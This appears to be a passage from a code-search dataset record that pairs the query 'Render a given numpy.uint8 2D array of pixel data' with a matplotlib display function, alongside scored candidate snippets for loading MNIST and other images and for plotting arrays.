\"*.jpg\")\n filenames = glob.glob(\"/\".join(path))\n images_one_type = [cv2.imread(img) for img in filenames]\n labels_one_type = [i] * len(images_one_type)\n images += images_one_type\n labels += labels_one_type\n\n return images, labels", "def iam_data_generator() -> tuple(npt.ArrayLike, str):\n \n with open(DATA_PATH) as iam:\n for line in iam:\n if not line.startswith('#'):\n im_path, word = parse_line(line)\n image = cv2.imread(im_path, cv2.IMREAD_GRAYSCALE)\n image = resize_image(image, IMG_SIZE)\n yield image, word", "def extract_images(filename,lx):\n print('Extracting', filename,'aaaaaa')\n \n data=numpy.loadtxt(filename,dtype='int64')\n dim=data.shape[0]\n data=data.reshape(dim, lx, lx, 1) \n # Convert shape from [num examples, rows, columns, depth]\n # to [num examples, rows*columns] (assuming depth == 1)\n data = data.reshape(data.shape[0],\n data.shape[1] * data.shape[2])\n # Convert from [0, 255] -> [0.0, 1.0].\n data = data.astype(numpy.float64)\n # images = numpy.multiply(images, 1.0 / 255.0) # commented since it is ising variables\n data = numpy.multiply(data, 1.0 ) # multiply by one, instead\n print(data.shape)\n return data", "def mnist_load_data(filename):\n if os.path.isfile(filename):\n mnist_file = open(filename, 'rb')\n train_set, valid_set, test_set = pickle.load(mnist_file)\n return train_set, valid_set, test_set\n else:\n print('Failed to find data file %s' % (filename))\n return None", "def _extract_labels(self, filename, one_hot=False):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n magic = self._read32(bytestream)\n if magic != 2049:\n raise ValueError(\n 'Invalid magic number %d in MNIST label file: %s' %\n (magic, filename))\n num_items = self._read32(bytestream)\n buf = bytestream.read(num_items)\n labels = np.frombuffer(buf, dtype=np.uint8)\n if one_hot:\n return self._dense_to_one_hot(labels)\n return labels", "def load_mnist (images_fn_gz, labels_fn_gz, digits=None, path=None, asbytes=False, selection=None, return_labels=True, return_indices=False):\n\n # We can skip the labels file only if digits aren't specified and labels aren't asked for\n if return_labels or digits is not None:\n flbl = gzip.open (labels_fn_gz, 'rb')\n magic_nr, size = struct.unpack(\">II\", flbl.read(8))\n labels_raw = pyarray(\"b\", flbl.read())\n flbl.close()\n\n fimg = gzip.open(images_fn_gz, 'rb')\n magic_nr, size, rows, cols = struct.unpack(\">IIII\", fimg.read(16))\n images_raw = pyarray(\"B\", fimg.read())\n fimg.close()\n\n if digits:\n indices = [k for k in range(size) if labels_raw[k] in digits]\n else:\n indices = range(size)\n\n if selection:\n indices = indices[selection] \n N = len(indices)\n\n images = zeros((N, rows, cols), dtype=uint8)\n\n if return_labels:\n labels = zeros((N), dtype=int8)\n for i, index in enumerate(indices):\n images[i] = array(images_raw[ indices[i]*rows*cols : (indices[i]+1)*rows*cols ]).reshape((rows, cols))\n if return_labels:\n labels[i] = labels_raw[indices[i]]\n\n if not asbytes:\n images = images.astype(float)/255.0\n\n ret = (images,)\n if return_labels:\n ret += (labels,)\n if return_indices:\n ret += (indices,)\n if len(ret) == 1:\n return ret[0] # Don't return a tuple of one\n else:\n return ret", "def read_labeled_image_list(image_list_file):\n f = open(image_list_file, 'r')\n filenames = []\n labels = []\n for line in f:\n filename, label = line[:-1].split(' ')\n filenames.append(filename)\n labels.append(int(label))\n return filenames, labels", "def get_train_data(trainlist):\n if not 
os.path.exists(trainlist):\n raise ValueError('Train data is not exist.')\n\n images = []\n labels = []\n count = 0\n lines = open(trainlist, 'r')\n lines = list(lines)\n for line in lines:\n image_file, label = line.strip('\\n').split('::')\n count += 1\n if count % 100 == 0:\n print('Load {} images.'.format(count))\n image = cv2.imread(image_file)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n images.append(image)\n labels.append(label)\n images = np.array(images)\n labels = np.array(labels)\n return images, labels", "def load_MNIST(filename_train='train.csv', filename_test='test.csv'):\n # Load training data\n reader = csv.reader(open(filename_train,\"rb\"), delimiter=',')\n reader.next()\n x = list(reader)\n\n xs = []\n ys = []\n for i in xrange(len(x)):\n ys.append([x[i][0]])\n xs.append(x[i][1:])\n Xtr = numpy.array(xs)\n Ytr = numpy.array(ys)\n\n # Load test data\n reader = csv.reader(open(filename,test,\"rb\"), delimiter=',')\n reader.next()\n x = list(reader)\n xs = []\n ys = []\n for i in xrange(len(x)):\n ys.append([x[i][0]])\n xs.append(x[i][1:])\n Xte = numpy.array(xs)\n Yte = numpy.array(ys)\n\n return Xtr,Ytr,Xte,Yte", "def read_labeled_image_list(image_list_file):\n\tf = open(image_list_file, 'r')\n\tfilenames = []\n\tlabels = []\n\tfor line in f:\n\t\tline = line.rstrip('\\n')\n\n\t\tfilename, _, label = line.partition(LABEL_SEP)#line[:-1].split(LABEL_SEP)\n\t\tfilenames.append(filename)\n\t\tlabels.append(int(label))\n\t\t#print (filename+LABEL_SEP+\":) \"+label)\n\treturn filenames, labels", "def get_inputs(mode, batch_size=64):\n # Get the base dataset\n if mode == 'train':\n dataset = ds.train('/tmp/mnist_data')\n elif mode in {'eval', 'predict', 'infer'}:\n dataset = ds.test('/tmp/mnist_data')\n else:\n raise ValueError(\n 'mode must be one of {\"train\", \"eval\", \"predict\", \"infer\"}')\n\n # repeat and shuffle if training\n if mode == 'train':\n dataset = dataset.repeat() # repeat indefinitely\n dataset = dataset.shuffle(buffer_size=10000)\n\n dataset = dataset.batch(batch_size)\n\n image, labels = dataset.make_one_shot_iterator().get_next()\n image = tf.reshape(image, (-1, 28, 28, 1))\n return image, labels", "def read_data_sets(data_dir, one_hot=True):\n data = mnist.input_data.read_data_sets(data_dir, one_hot=one_hot)\n return (data.train, data.test)", "def _load_images_labels(self):\n path_dataset_file = self.path_model_id.joinpath(f'{self.set_name}_set.csv')\n \n with path_dataset_file.open(mode='r', newline='') as f:\n csv_reader = reader(f, delimiter=',')\n rows = list(csv_reader)\n\n if self.shuffle:\n rng = default_rng(self.seed)\n rng.shuffle(rows)\n \n self.n_examples = len(rows)\n\n ds_files = tf.data.Dataset.from_tensor_slices(\n [path.join(str(self.path_data), f'label_{row[1]}', row[0])\n for row in rows])\n \n ds_images = ds_files.map(self._load_preprocess_image)\n\n class_labels_enc = self.class_le.fit_transform(\n [row[1] for row in rows])\n\n ds_labels = tf.data.Dataset.from_tensor_slices(\n class_labels_enc)\n\n return ds_images, ds_labels", "def load_image_data():\n print(\"Loading image data...\")\n label_dict = get_label_vectors()\n categories = [c for c in os.listdir('images/') if c[0] != '.'] # ignore\n labels = [] # instantiate list for image labels\n data = [] # instantiate list for image data\n for i in categories:\n path = 'images/{}/'.format(i) # define path to category folder\n for j in os.listdir(path): # get images from category folder\n labels.append(label_dict[i]) # append label vector\n data.append(cv2.imread(path + 
j).flatten()) # append flattened image data\n\n labels = np.array(labels) # convert lists to array\n data = np.array(data)\n print(\"Done.\")\n\n return labels, data", "def fetch_mnist():\n data_path = check_fetch_mnist()\n f = gzip.open(data_path, 'rb')\n try:\n train_set, valid_set, test_set = pickle.load(f, encoding=\"latin1\")\n except TypeError:\n train_set, valid_set, test_set = pickle.load(f)\n f.close()\n train_indices = np.arange(0, len(train_set[0]))\n valid_indices = np.arange(0, len(valid_set[0])) + train_indices[-1] + 1\n test_indices = np.arange(0, len(test_set[0])) + valid_indices[-1] + 1\n return {\"data\": np.concatenate((train_set[0], valid_set[0], test_set[0]),\n axis=0).astype(theano.config.floatX),\n \"target\": np.concatenate((train_set[1], valid_set[1], test_set[1]),\n axis=0).astype(np.int32),\n \"train_indices\": train_indices.astype(np.int32),\n \"valid_indices\": valid_indices.astype(np.int32),\n \"test_indices\": test_indices.astype(np.int32)}", "def extract_labels(filename, one_hot=False):\n\tprint('Extracting', filename)\n\twith gzip.open(filename) as bytestream:\n\t\tmagic = _read32(bytestream)\n\t\tif magic != 2049:\n\t\t\traise ValueError('Invalid magic number %d in MNIST label file: %s' %(magic, filename))\n\t\tnum_items = _read32(bytestream)\n\t\tbuf = bytestream.read(num_items)\n\t\tlabels = numpy.frombuffer(buf, dtype=numpy.uint8)\n\t\tif one_hot:\n\t\t\treturn dense_to_one_hot(labels)\n\t\treturn labels", "def load_data(fname):\n pathname = \"data/\" + fname\n data = pickle.load(open(pathname, 'rb'), encoding='latin1')\n images = np.array([img[:-1] for img in data])\n ys = [int(img[-1]) for img in data]\n length = len(ys)\n labels = np.zeros((length, 10))\n\n for i in range(length):\n labels[i, ys[i]] = 1\n\n return images, labels", "def read_picture_data(filename):\n file_name = os.path.join('.', 'datas', filename)\n\n try:\n with open(file_name, 'rb') as file:\n read_data = file.read()\n except FileNotFoundError:\n print(f'Oups, the file {filename} was not found')\n\n try:\n if filename == 'train-images.idx3-ubyte':\n number_of_pics = 60000\n else:\n number_of_pics = 10000\n except LookupError:\n print(f'Oups, the file {filename} was not named as a MNist file')\n\n picture_data = np.zeros((number_of_pics, 28 * 28)) # 28*28 = 784\n\n s = 0\n for n in range(16, number_of_pics * 784, 784): # 16 header bytes being dumped\n for t, byte in enumerate(read_data[n: n + 784]):\n picture_data[s, t] = byte\n s += 1\n\n print(f'\\nPicture data read from {filename}\\n')\n\n return picture_data", "def load_data():\r\n\r\n mnist_file = gzip.open('../data/mnist.pkl.gz', 'rb')\r\n ## opening the gz archive file by using gzip's open function\r\n\r\n training_data, validation_data, test_data = cPickle.load(mnist_file, encoding='latin1')\r\n ## loading the training, validation and test data by using cPickle's load function\r\n ## passing encoding parameter as ``latin1``\r\n\r\n mnist_file.close()\r\n ## closing the mnist_file\r\n\r\n return (training_data, validation_data, test_data)", "def extract_labels(filename, one_hot=False):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n magic = _read32(bytestream)\n if magic != 2049:\n raise ValueError(\n 'Invalid magic number %d in MNIST label file: %s' %\n (magic, filename))\n num_items = _read32(bytestream)[0]\n #print('check', magic, num_items)\n buf = bytestream.read(num_items)\n labels = numpy.frombuffer(buf, dtype=numpy.uint8)\n if one_hot:\n return dense_to_one_hot(labels)\n return labels", 
"def get_raw_data():\n\twith open('train_label.pkl', 'rb') as f:\n\t\ttrain_label = pickle.load(f)\n\n\twith open('train_image.pkl', 'rb') as f:\n\t\ttrain_data = pickle.load(f)\n\n\tprint(np.unique(np.asarray(train_label)))\n\n\treturn (train_label, np.asarray(train_data))", "def load_mnist_data(amount : int = None, mnist_location : str = \"C:\\\\Users\\\\Vova\\\\PycharmProjects\\\\Neural_Network_test\\\\mnist-csv\",\n to_shuffle = True, output_process_info = True, debug=False) -> Tuple[np.array, np.array]:\n if debug:\n output_process_info = True\n buff_all_file_names = recursive_relative_lsdir(mnist_location)\n if output_process_info:\n print(\"Got mnist file names!\")\n\n if to_shuffle:\n random.shuffle(buff_all_file_names)\n if output_process_info:\n print(\"Shuffled mnist images!\")\n\n if amount is not None:\n all_file_names = buff_all_file_names[:amount]\n else:\n all_file_names = buff_all_file_names\n\n labels = np.array([int(split_path(p)[-2]) for p in all_file_names])\n if output_process_info:\n print(f\"Labeled mnist file names ({len(labels)} pcs)!\")\n\n if debug:\n s = 0\n for i in range(10):\n print(f\"Pictures for number {i}: {list(labels).count(i)}\")\n s += list(labels).count(i)\n print(\"Total:\", s)\n\n # Loading images:\n images = np.zeros((len(labels), 28, 28), dtype=np.float64)\n for i in range(len(all_file_names)):\n images[i] = convert_csv_to_array(all_file_names[i])\n percent = 100 * i / len(all_file_names)\n if random.random() < 0.001:\n print(f\"Loading is {round(percent, 3)} % ready... \", end=\"\\n\\r\")\n\n print(\"Your mnist dataset is ready :) !!!\")\n\n return labels, images", "def load_images(filelist):\n # pixel value range 0-255\n if not isinstance(filelist, list):\n im = Image.open(filelist).convert('L')\n return np.array(im).reshape(1, im.size[1], im.size[0], 1)\n data = []\n for file in filelist:\n im = Image.open(file).convert('L')\n data.append(np.array(im).reshape(1, im.size[1], im.size[0], 1))\n return data", "def load_images(input_dir, batch_shape):\n images = np.zeros(batch_shape)\n filenames = []\n idx = 0\n batch_size = batch_shape[0]\n # all_files = tf.gfile.Glob(os.path.join(input_dir, '*.png'))\n # test_files = [all_files[idx] for x in np.random.choice(len(all_files), 200, replace=False)]\n # for filepath in test_files:\n for filepath in tf.gfile.Glob(os.path.join(input_dir, '*.png')):\n with tf.gfile.Open(filepath) as f:\n image = imread(f, mode='RGB').astype(np.float) / 255.0\n # Images for inception classifier are normalized to be in [-1, 1] interval.\n images[idx, :, :, :] = image * 2.0 - 1.0\n filenames.append(os.path.basename(filepath))\n idx += 1\n if idx == batch_size:\n yield filenames, images\n filenames = []\n images = np.zeros(batch_shape)\n idx = 0\n if idx > 0:\n yield filenames, images", "def load_mnist(dataset_name='mnist', **kwargs):\n dataset_name = dataset_name.strip().lower().replace('minist', 'mnist')\n\n if dataset_name.lower() not in ['mnist', 'fashion-mnist']:\n raise ValueError('Only mnist or fashion-mnist are valid dataset_name.')\n\n base = 'http://yann.lecun.com/exdb/mnist/'\n if dataset_name == 'fashion-mnist':\n base = 'http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/'\n\n dirname = os.path.join(_trident_dir, dataset_name)\n make_dir_if_need(dirname)\n\n \"\"\"Load MNIST data from `path`\"\"\"\n trainData = None\n testData = None\n for kind in ['train', 'test']:\n labels_file = '{0}-labels-idx1-ubyte.gz'.format( 't10k' if dataset_name in ('mnist', 'fashion-mnist') and kind == 'test' else kind)\n 
images_file = '{0}-images-idx3-ubyte.gz'.format( 't10k' if dataset_name in ('mnist', 'fashion-mnist') and kind == 'test' else kind)\n # if dataset_name == 'emnist' :\n # labels_file='emnist-balanced-'+labels_file\n # images_file = 'emnist-balanced-' + images_file\n\n is_data_download = download_file(base + labels_file, dirname, labels_file, dataset_name + '_labels_{0}'.format(kind))\n is_label_download = download_file(base + images_file, dirname, images_file, dataset_name + '_images_{0}'.format(kind))\n if is_data_download and is_label_download:\n labels_path = os.path.join(dirname, labels_file)\n images_path = os.path.join(dirname, images_file)\n labeldata = None\n imagedata = None\n with gzip.open(labels_path, 'rb') as lbpath:\n labels = np.frombuffer(lbpath.read(), dtype=np.uint8, offset=8)\n labels = np.squeeze(labels).astype(np.int64)\n labeldata = LabelDataset(labels.tolist(),object_type=ObjectType.classification_label)\n\n with gzip.open(images_path, 'rb') as imgpath:\n images = np.frombuffer(imgpath.read(), dtype=np.uint8, offset=16)\n images = np.reshape(images, (len(labels), 784)).astype(dtype=_session.floatx)\n images = np.reshape(images, (-1, 28, 28))\n imagedata = ImageDataset(images, object_type=ObjectType.gray)\n if kind == 'train':\n trainData = Iterator(data=imagedata, label=labeldata)\n else:\n testData = Iterator(data=imagedata, label=labeldata)\n\n dataset = DataProvider(dataset_name, traindata=trainData, testdata=testData)\n dataset.binding_class_names(\n [0, 1, 2, 3, 4, 5, 6, 7, 8, 9] if dataset_name == 'mnist' else ['T-shirt/top', 'Trouser', 'Pullover',\n 'Dress', 'Coat', 'Sandal', 'Shirt',\n 'Sneaker', 'Bag', 'Ankle boot'],\n 'en-US')\n\n return dataset\n return None", "def load_mnist(train_data=True, test_data=False):\n os.chdir(ROOT_DIR)\n RESOURCES = [\n 'train-images-idx3-ubyte.gz', 'train-labels-idx1-ubyte.gz',\n 't10k-images-idx3-ubyte.gz', 't10k-labels-idx1-ubyte.gz'\n ]\n\n if (os.path.isdir('data') == 0):\n os.mkdir('data')\n if (os.path.isdir('data/mnist') == 0):\n os.mkdir('data/mnist')\n for name in RESOURCES:\n if (os.path.isfile('data/mnist/' + name) == 0):\n url = 'https://github.com/HIPS/hypergrad/raw/master/data/mnist/' + name\n r = requests.get(url, allow_redirects=True)\n open('data/mnist/' + name, 'wb').write(r.content)\n\n return get_images(train_data, test_data), get_labels(train_data, test_data)", "def extract_labels(f, one_hot=False, num_classes=10):\n\tprint('Extracting', f.name)\n\twith gzip.GzipFile(fileobj=f) as bytestream:\n\t\tmagic = _read32(bytestream)\n\t\tif magic != 2049:\n\t\t\traise ValueError('Invalid magic number %d in MNIST label file: %s' %\n\t\t\t\t\t\t\t\t\t\t\t (magic, f.name))\n\t\tnum_items = _read32(bytestream)\n\t\tbuf = bytestream.read(num_items)\n\t\tlabels = numpy.frombuffer(buf, dtype=numpy.uint8)\n\t\tif one_hot:\n\t\t\treturn dense_to_one_hot(labels, num_classes)\n\t\treturn labels" ]
[ "0.7315804", "0.7006713", "0.6858111", "0.679963", "0.67536896", "0.66597587", "0.6541016", "0.6534925", "0.64882743", "0.6464874", "0.64425945", "0.6425871", "0.6410244", "0.63993555", "0.63947785", "0.63876855", "0.6385198", "0.638357", "0.63787776", "0.6377489", "0.63731724", "0.63731724", "0.636989", "0.6352457", "0.6351951", "0.63468134", "0.63455844", "0.6341949", "0.63357073", "0.63017946", "0.62983096", "0.6290907", "0.6288806", "0.6279747", "0.6268433", "0.6264253", "0.62552315", "0.6246953", "0.62435514", "0.6239381", "0.62325287", "0.6230796", "0.62203676", "0.62146246", "0.6197815", "0.6194898", "0.6192909", "0.61761963", "0.617527", "0.61490923", "0.61211663", "0.61178625", "0.60970306", "0.6079482", "0.6076527", "0.6074948", "0.60709023", "0.6068326", "0.6060465", "0.60592127", "0.60551095", "0.6052272", "0.6050346", "0.6047254", "0.6041249", "0.6037301", "0.6030159", "0.6013727", "0.6004389", "0.60037863", "0.59822595", "0.59467757", "0.5941879", "0.59400856", "0.59394807", "0.5915455", "0.5901478", "0.5890986", "0.58899117", "0.5886207", "0.58832437", "0.58788145", "0.5868975", "0.58663815", "0.5864649", "0.58584285", "0.58573127", "0.5853375", "0.5829219", "0.58248055", "0.5805781", "0.5803976", "0.57990056", "0.57985324", "0.5796923", "0.57842517", "0.5783535", "0.57807887", "0.57802343", "0.5777534" ]
0.6018545
67
Render a given numpy.uint8 2D array of pixel data.
def show(image):
    from matplotlib import pyplot
    import matplotlib as mpl

    fig = pyplot.figure()
    ax = fig.add_subplot(1,1,1)
    imgplot = ax.imshow(image, cmap=mpl.cm.Greys)
    imgplot.set_interpolation('nearest')
    ax.xaxis.set_ticks_position('top')
    ax.yaxis.set_ticks_position('left')
    pyplot.show()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def plot_pixel_array(arr, figsize=(10, 10)):\n arr = arr.squeeze()\n plt.figure(figsize=figsize)\n plt.imshow(arr, cmap=plt.cm.bone)\n plt.show()", "def render(self):\n np_img = np.array(self.prev_img, dtype=np.uint8)\n np_img = np.swapaxes(np_img, 0, 2)\n return np_img", "def data(self, arr):\n self.bitmap(arr, 1)", "def fig2data(figure):\n # draw the renderer\n figure.canvas.draw()\n\n # Get the RGBA buffer from the figure\n w, h = figure.canvas.get_width_height()\n buf = np.fromstring(figure.canvas.tostring_argb(), dtype=np.uint8)\n buf.shape = (w, h, 4)\n\n # canvas.tostring_argb give pixmap in ARGB mode. Roll the ALPHA channel to have it in RGBA mode\n buf = figure.roll(buf, 3, axis=2)\n return buf", "def display(array):\n plt.figure()\n plt.imshow(array)\n plt.show()", "def fig2data(fig):\n # draw the renderer\n fig.canvas.draw()\n\n # Get the RGBA buffer from the figure\n w, h = fig.canvas.get_width_height()\n buf = np.fromstring(fig.canvas.tostring_argb(), dtype=np.uint8)\n buf.shape = (w, h, 4)\n\n # canvas.tostring_argb give pixmap in ARGB mode. Roll the ALPHA channel to have it in RGBA mode\n buf = np.roll(buf, 3, axis=2)\n return buf", "def render(self):\n\n pixels = [\n [Color() for _ in range(self.width)] for _ in range(self.height)]\n\n for y in range(self.height):\n for x in range(self.width):\n ray_direction = Point(x, y) - self.camera\n ray = Ray(self.camera, ray_direction)\n pixels[y][x] = self._trace_ray(ray)\n\n return pixels", "def generate_colour_data(width, height, imagiry_data, pixel2coord):\n for i in range(1, height):\n for j in range(1, width):\n colour_data.append(\n [\n pixel2coord(j, i)[0],\n pixel2coord(j, i)[1],\n imagiry_data.read([1])[0][i - 1][j - 1],\n \n ]\n )", "def fig2data(fig):\n # draw the renderer\n fig.canvas.draw()\n\n # Get the RGBA buffer from the figure\n w, h = fig.canvas.get_width_height()\n buf = np.fromstring(fig.canvas.tostring_argb(), dtype=numpy.uint8)\n buf.shape = (w, h, 4)\n\n # canvas.tostring_argb give pixmap in ARGB mode. 
Roll the ALPHA channel to have it in RGBA mode\n buf = np.roll(buf, 3, axis=2)\n return buf", "def draw_pixel_to_display(self):\n register = self.return_middle_registers(self.opcode)\n x = self.registers[register[0]]\n y = self.registers[register[1]]\n height = self.opcode & 0xF\n\n self.registers[0xF] = 0\n\n x = bit_utils.wrap_around(x, self.display.width)\n y = bit_utils.wrap_around(y, self.display.height)\n\n for yline in range(0, height):\n pixels = self.memory[self.I + yline]\n y1 = bit_utils.wrap_around(y + yline, self.display.height)\n for xline in range(0, 8):\n x1 = bit_utils.wrap_around(x + xline, self.display.width)\n if pixels & (0x80 >> xline) != 0:\n if self.display.set_pixel(x1, y1):\n self.registers[0xF] = 1\n\n self.display.draw_flag = True\n logger.info(\"Drawing sprite from {} to {} at {}, {}\".format(\n hex(self.I),\n hex(self.I + height),\n x, y))", "def disImg(data=None,colorbar=False):\n size = np.sqrt(len(data[4:]))\n xmm = data[0]\n ymm = data[1]\n pl.matshow(data[4:].reshape(size,size),fignum=False)\n if colorbar == True:\n pl.colorbar()\n pl.xlim(0,size-1)\n pl.ylim(0,size-1)\n pl.xlabel('Pixels')\n pl.ylabel('Pixels')\n pl.grid(color='yellow')", "def render_frame_color(self, sim: Simulator) -> np.array:\n (w, h) = sim.get_frame_size()\n rgba = 4\n size = h * w * rgba\n frame = bytearray(size)\n self.get_state().render_into_buffer(frame, True)\n return np.asarray(frame, dtype=np.uint8).reshape(h, w, rgba)", "def imshow(image):\n iio.imshow(dtype.im2uint(image))", "def display(self, colorArray):\n pass", "def fig2data(fig):\n # draw the renderer\n fig.canvas.draw()\n\n # Get the RGBA buffer from the figure\n w, h = fig.canvas.get_width_height()\n buf = numpy.fromstring(fig.canvas.tostring_argb(), dtype=numpy.uint8)\n buf.shape = (w, h, 4)\n\n # canvas.tostring_argb give pixmap in ARGB mode.\n # Roll the ALPHA channel to have it in RGBA mode\n buf = numpy.roll(buf, 3, axis=2)\n return buf", "def get_rendered_image(self) -> np.ndarray:\n return np.transpose(self.state['observation'], [1, 2, 0])", "def fig2buf(fig):\n # draw the renderer\n fig.canvas.draw()\n\n # Get the RGBA buffer from the figure\n w,h = fig.canvas.get_width_height()\n buf = np.fromstring ( fig.canvas.tostring_argb(), dtype=np.uint8 )\n buf.shape = (h, w, 4)\n \n # canvas.tostring_argb give pixmap in ARGB mode. 
Roll the ALPHA channel to have it in RGBA mode\n buf = np.roll(buf, 3, axis = 2 )\n buf = buf[0::1,0::1] #slice to make image 4x smaller and use only the R channel of RGBA\n buf = buf[0::1,0::1, 0:3] #slice to make image 4x smaller and use only the R channel of RGBA\n return buf", "def _tile_image(self, data):\n image = Image.open(BytesIO(data))\n return image.convert('RGBA')", "def show_digit( Pixels ):\n from matplotlib import pyplot as plt\n print(Pixels.shape)\n Patch = Pixels.reshape((8,8))\n plt.figure(1, figsize=(4,4))\n plt.imshow(Patch, cmap=plt.cm.gray_r, interpolation='nearest') # plt.cm.gray_r # plt.cm.hot\n plt.show()", "def show_digit( Pixels ):\r\n print(Pixels.shape)\r\n Patch = Pixels.reshape((8,8))\r\n plt.figure(1, figsize=(4,4))\r\n plt.imshow(Patch, cmap=plt.cm.gray_r, interpolation='nearest') # cm.gray_r # cm.hot\r\n plt.show()", "def render_frame_grayscale(self, sim: Simulator) -> np.array:\n (w, h) = sim.get_frame_size()\n depth = 1\n size = h * w * depth\n frame = bytearray(size)\n self.get_state().render_into_buffer(frame, False)\n return np.asarray(frame, dtype=np.uint8).reshape(h, w, depth)", "def render_array(self, resolution=300, channel=\"GRAYSCALE\"):\n # Method below returns a cairocffi.ImageSurface object\n # https://cairocffi.readthedocs.io/en/latest/api.html#cairocffi.ImageSurface\n surface, width, height = self._document.write_image_surface(\n resolution=resolution\n )\n img_format = surface.get_format()\n\n # This is BGRA channel in little endian (reverse)\n if img_format != FORMAT_ARGB32:\n raise RuntimeError(\n f\"Expect surface format to be 'cairocffi.FORMAT_ARGB32', but got {img_format}.\" +\n \"Please check the underlining implementation of 'weasyprint.document.Document.write_image_surface()'\"\n )\n\n img_buffer = surface.get_data()\n # Returns image array in \"BGRA\" channel\n img_array = np.ndarray(\n shape=(height, width, 4), dtype=np.uint8, buffer=img_buffer\n )\n if channel == \"GRAYSCALE\":\n return cv2.cvtColor(img_array, cv2.COLOR_BGRA2GRAY)\n elif channel == \"RGBA\":\n return cv2.cvtColor(img_array, cv2.COLOR_BGRA2RGBA)\n elif channel == \"RGB\":\n return cv2.cvtColor(img_array, cv2.COLOR_BGRA2RGB)\n elif channel == \"BGRA\":\n return np.copy(img_array)\n elif channel == \"BGR\":\n return cv2.cvtColor(img_array, cv2.COLOR_BGRA2BGR)\n else:\n valid_channels = [\"GRAYSCALE\", \"RGB\", \"RGBA\", \"BGR\", \"BGRA\"]\n raise ValueError(\n f\"Invalid channel code {channel}. 
Valid values are: {valid_channels}.\"\n )", "def map_screen(self, data_array):\n\n if len(data_array) == 0:\n return []\n elif len(data_array) == 1:\n xtmp, ytmp = transpose(data_array)\n x_ary = xtmp\n y_ary = ytmp\n else:\n x_ary, y_ary = transpose(data_array)\n\n sx = self.index_mapper.map_screen(x_ary)\n sy = self.value_mapper.map_screen(y_ary)\n\n if self.orientation == 'h':\n return transpose(array((sx, sy)))\n else:\n return transpose(array((sy, sx)))", "def render(filename,i):\n print('running render')\n A = np.genfromtxt(filename,skip_header=1,dtype=float,delimiter=',')\n img = np.array(A[i,:],copy=True)\n print(img.shape)\n img = img.reshape(28,28)\n img = 255 - img\n print(img.shape)\n plt.imshow(img, cmap=\"gray\", vmin=0, vmax=255)\n plt.savefig(\"img\" + str(i)+\"render\"+ \".png\")", "def fig2array(fig):\n fig.canvas.draw()\n w, h = fig.canvas.get_width_height()\n buf = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8)\n buf.shape = (w, h, 3)\n return buf", "async def handle(cls, payload:bytearray):\n logger.debug('Rendering graphics')\n try:\n arr = struct.unpack(f'<{len(payload)}B', payload)[6:66]\n # generates 1 pixel heigth image\n img = Image.frombytes(data=bytes(arr), size=(len(arr)*8,1), mode='1')\n # pixel data is repeated several times\n repeats = struct.unpack('<2B', payload[4:6])[0]\n # prepare new image\n bc = Image.new(mode='1', size=(len(arr)*8, repeats))\n # append 1 px data several times (repeats)\n for i in range(0,repeats):\n bc.paste(img, (0,i))\n # invert colors black/white\n bc_inverted = ImageOps.invert(bc.convert('L'))\n except Exception as e:\n logger.exception(e)\n else:\n Printer().buffer.image(bc_inverted, impl=cls.impl, center=cls.center)\n logger.debug('Buffering barcode image')", "def pngxy(data):\n ihdr = data.index(b'IHDR')\n # next 8 bytes are width/height\n w4h4 = data[ihdr+4:ihdr+12]\n return struct.unpack('>ii', w4h4)", "def visualize_channels(channels_uint8, nb_vertically, path):\n if channels_uint8.dtype != numpy.uint8:\n raise TypeError('`channels_uint8.dtype` is not equal to `numpy.uint8`.')\n \n # If `channels_uint8.ndim` is not equal to 4, the unpacking\n # below raises a `ValueError` exception.\n # If `channels_uint8.shape[3]` is not equal to 1, `numpy.squeeze`\n # raises a `ValueError` exception.\n (nb_images, height_channel, width_channel, _) = channels_uint8.shape\n \n # If the check below did not exist, the channel of some\n # images may be missing in `image_uint8`.\n if nb_images % nb_vertically != 0:\n raise ValueError('`channels_uint8.shape[0]` is not divisible by `nb_vertically`.')\n \n # `nb_horizontally` has to be an integer.\n nb_horizontally = nb_images//nb_vertically\n image_uint8 = 255*numpy.ones((nb_vertically*(height_channel + 1) + 1, nb_horizontally*(width_channel + 1) + 1), dtype=numpy.uint8)\n for i in range(nb_vertically):\n for j in range(nb_horizontally):\n image_uint8[i*(height_channel + 1) + 1:(i + 1)*(height_channel + 1), j*(width_channel + 1) + 1:(j + 1)*(width_channel + 1)] = \\\n numpy.squeeze(channels_uint8[i*nb_horizontally + j, :, :, :],\n axis=2)\n save_image(path,\n image_uint8)", "def modifyPixel(pix, data):\n datalist = convertData(data)\n lendata = len(datalist)\n imdata = iter(pix)\n\n for i in range(lendata):\n pix = [value for value in imdata.__next__()[:3] +\n imdata.__next__()[:3] +\n imdata.__next__()[:3]]\n\n for j in range(0, 8):\n if (datalist[i][j] == '0' and pix[j] % 2 != 0):\n pix[j] -= 1\n\n elif (datalist[i][j] == '1' and pix[j] % 2 == 0):\n if (pix[j] != 0):\n pix[j] -= 1\n 
else:\n pix[j] += 1\n\n if (i == lendata - 1):\n if (pix[-1] % 2 == 0):\n if (pix[-1] != 0):\n pix[-1] -= 1\n else:\n pix[-1] += 1\n\n else:\n if (pix[-1] % 2 != 0):\n pix[-1] -= 1\n\n pix = tuple(pix)\n yield pix[0:3]\n yield pix[3:6]\n yield pix[6:9]", "def render_image(grid,window):\r\n X = len(grid[0])\r\n Y = len(grid)\r\n#top row:\r\n for j in range(Y):\r\n for sub_j in range(3): #3 rows \r\n ROW = []\r\n for i in range(X):\r\n ROW += grid[j][i].arr[sub_j]\r\n \r\n for k in range(len(ROW)):\r\n COLOR = (ROW[k],ROW[k],ROW[k])\r\n Y_pos = (3*j + sub_j)*pixel_size*scale\r\n X_pos = k*(pixel_size)*scale\r\n width = height = pixel_size*scale\r\n pygame.draw.rect(window,COLOR,(X_pos,Y_pos,width,height))\r\n \r\n# print(ROW)\r\n return", "def _repr_html_(self):\n\n import numpy as np\n import matplotlib.pyplot as plt\n from .._tier9 import imshow\n\n\n size_in_pixels = np.prod(self.shape)\n size_in_bytes = size_in_pixels * self.dtype.itemsize\n\n labels = (self.dtype == np.uint32)\n\n # In case the image is 2D, 3D and larger than 100 pixels, turn on fancy view\n if len(self.shape) in (2, 3) and size_in_pixels >= 100:\n import matplotlib.pyplot as plt\n imshow(self,\n labels=labels,\n continue_drawing=True,\n 